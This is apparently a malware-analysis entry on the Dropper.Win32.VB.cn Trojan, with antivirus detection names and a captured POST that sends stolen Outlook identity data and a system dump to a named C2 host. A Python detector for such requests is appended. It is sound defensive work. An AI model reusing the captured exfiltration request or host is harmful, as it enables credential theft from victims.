Dropper.Win32.VB.cn
Applies to other similar droppers, but this is the one we saw first posting like this.
Sig: 2007987 should cover it.
VirusTotal result:
AntiVir TR/Drop.VB.ON.31
Avast Win32:Agent-FLY
AVG Dropper.Generic.TTR
ClamAV PUA.Packed.Themida
F-Prot W32/Heuristic-162!Eldorado
F-Secure SDBot.gen8
Fortinet W32/VB.ON!tr
Ikarus Virus.Win32.Agent.FLY
Kaspersky Trojan-Dropper.Win32.VB.on
Norman SDBot.gen8
Prevx1 Heuristic:Suspicious Code
Sophos Sus/ComPack
TheHacker Trojan/Dropper.VB.on
VBA32 Trojan-Dropper.Win32.VB.on
Webwasher-Gateway Trojan.Drop.VB.ON.31
Packer: Themida
Makes a post like so, slightly obfuscated:
POST /admin/upper.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tzine1993.tz.funpic.de
Content-Length: 2981
Connection: Keep-Alive
Cache-Control: no-cache
post===================================================
Resource Name : IdentitiesPass
Resource Type : Outlook Express Identity
User Name/Value : Main Identity
Password :
==================================================
***************************************************************
***************************************************************
***************************************************************
************************STEAM PASSWORDS************************
Steam Account Reader
http://www.steampowered.com
*** ONLY FOR USE IF YOU'VE FORGOT _YOUR_ STEAM LOGIN ***
[-] Checking for valid files..
[x] Invalid Steam account files.
[x] Invalid Steam account files.
***************************************************************
***************************************************************
***************************************************************
************************INFO ABOUT PC**************************
************************ PC-DRIVES: ***************************
C: FIXED DISK DRIVE
D: CD DRIVE
************************ OTHER PC INFORMATION: ***************************
WLNumDLLsProt=0
USERNAME: xxxx
USERDOMAIN: xxxx
PROCESSOR_IDENTIFIER: x86 Family 6 Model 3 Stepping 3, GenuineIntel
NUMBER_OF_PROCESSORS: 1
OS: Windows_NT
Number of procesor: 1
Processor: 586
Low memory address: 65536
High memory address: 2147418111
Number of mouse buttons: 5
Screen X: 800
Screen Y: 600
Height of windows caption: 26
Width between desktop icons: 75
Maximum width when resizing a window: 612
Is machine is too slow to run windows? 0
C:\Documents and Settings\All Users
C:\Documents and Settings\Default User
C:\Documents and Settings
C:\Documents and Settings\xxxx
ComputerName: xxxx
Windows System directory: C:\WINDOWS\system32
AC power status: OnLine
Battery charge status: No system battery
UserName: xxxx
Temp Path: C:\DOCUME~1\bob1\LOCALS~1\Temp\
OS: Windows NT
Win version: 5.1
Build: 2600
Start menu folder: C:\Documents and Settings\xxxx\Start Menu
Favorites folder: C:\Documents and Settings\xxxx\Favorites
Programs folder: C:\Documents and Settings\xxxx\Start Menu\Programs
Desktop folder: C:\Documents and Settings\xxxx\Desktop
SYSTEMZEIT:
The System Date is:3-11-2008
The System Time is:22:51:35
LOKALZEIT:
The Local Date is:3-11-2008
The Local Time is:18:51:35
2 IP addresses found on PC !!
----------------------------------------
IP address : 192.168.xx.xx
IP Subnetmask : 255.255.255.0
BroadCast IP address : 1.0.0.0
**************************************
IP address : 127.0.0.1
IP Subnetmask : 255.0.0.0
BroadCast IP address : 1.0.0.0
**************************************
Pfad von wo aus die server.exe gestartet wurde: c:\
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2008 17:57:19 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Re: 8116f2e3b33c462c18168fb44ca32a97
--
MattJonkman - 12 Mar 2008
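Added example, not part of the post above and not the Emerging Threats signature 2007987: a small Python parser that splits a raw HTTP request into request line, headers and body, then scores it against the fixed report labels visible in the captured POST (the "post=" form field, the "Resource Name : IdentitiesPass" block, the "STEAM PASSWORDS" banner, the German "Pfad von wo aus die server.exe gestartet wurde" line). Matching on those labels is more robust than matching the host, which changes between samples. The sample request is constructed for the example, modelled on the capture, with a placeholder host (`dropper-c2.example.invalid`) and a trimmed body; the function and class names are the example's own.

```python
"""Flag credential/system-info exfiltration POSTs of the kind captured above.

Example code; the sample requests below are constructed, not the original
capture. Host names are placeholders.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Fixed report labels taken from the captured POST body. The dropper prints
# these around the stolen data, so they are stable across infected hosts.
BODY_MARKERS = (
    "Resource Name : IdentitiesPass",
    "STEAM PASSWORDS",
    "INFO ABOUT PC",
    "Pfad von wo aus die server.exe gestartet wurde",
)


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def parse_http_request(raw: bytes) -> Optional[HttpRequest]:
    """Split a raw HTTP/1.x request into method, URI, headers and body.

    Returns None when the blob is not a well-formed request (no blank line
    separating headers from body, or a malformed request line).
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    req = HttpRequest(method=parts[0], uri=parts[1])
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            req.headers[name.strip().lower()] = value.strip()
    req.body = body.decode("latin-1", errors="replace")
    return req


def exfil_indicators(req: HttpRequest) -> List[str]:
    """Return the list of reasons this request looks like the dropper's report."""
    hits: List[str] = []
    if req.method != "POST":
        return hits
    ctype = req.headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and req.uri.lower().endswith(".php"):
        hits.append("form-encoded POST to a .php script")
    if req.body.startswith("post="):
        hits.append("single 'post=' form field carrying free text")
    for marker in BODY_MARKERS:
        if marker in req.body:
            hits.append(f"report marker: {marker}")
    if re.search(r"^Password\s*:", req.body, re.MULTILINE):
        hits.append("'Password :' label in body")
    if re.search(r"\bUSERNAME:\s*\S", req.body):
        hits.append("environment dump (USERNAME) in body")
    return hits


def is_exfil(req: HttpRequest, min_hits: int = 2) -> bool:
    """A plain form POST to a PHP page alone is not enough; require two signals."""
    return len(exfil_indicators(req)) >= min_hits


# Constructed sample modelled on the capture (placeholder host, trimmed body).
SAMPLE_BODY = (
    b"post===================================================\r\n"
    b"Resource Name : IdentitiesPass\r\n"
    b"Resource Type : Outlook Express Identity\r\n"
    b"User Name/Value : Main Identity\r\n"
    b"Password : \r\n"
    b"************************STEAM PASSWORDS************************\r\n"
    b"USERNAME: xxxx\r\n"
)
SAMPLE_POST = (
    b"POST /admin/upper.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    b"Host: dropper-c2.example.invalid\r\n"  # constructed placeholder host
    b"Content-Length: %d\r\n\r\n" % len(SAMPLE_BODY)
) + SAMPLE_BODY

# Constructed benign control: an ordinary login form POST.
BENIGN_POST = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: www.example.com\r\n\r\n"
    b"user=alice&remember=1"
)

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_POST), ("benign", BENIGN_POST)):
        req = parse_http_request(blob)
        print(name, is_exfil(req), exfil_indicators(req))
```

Run over a pcap-derived request stream, the `is_exfil` threshold keeps an ordinary PHP login form at one weak signal while the dropper's report trips five or six; tune `BODY_MARKERS` per family rather than keying on the host, which is the part most likely to change between droppers.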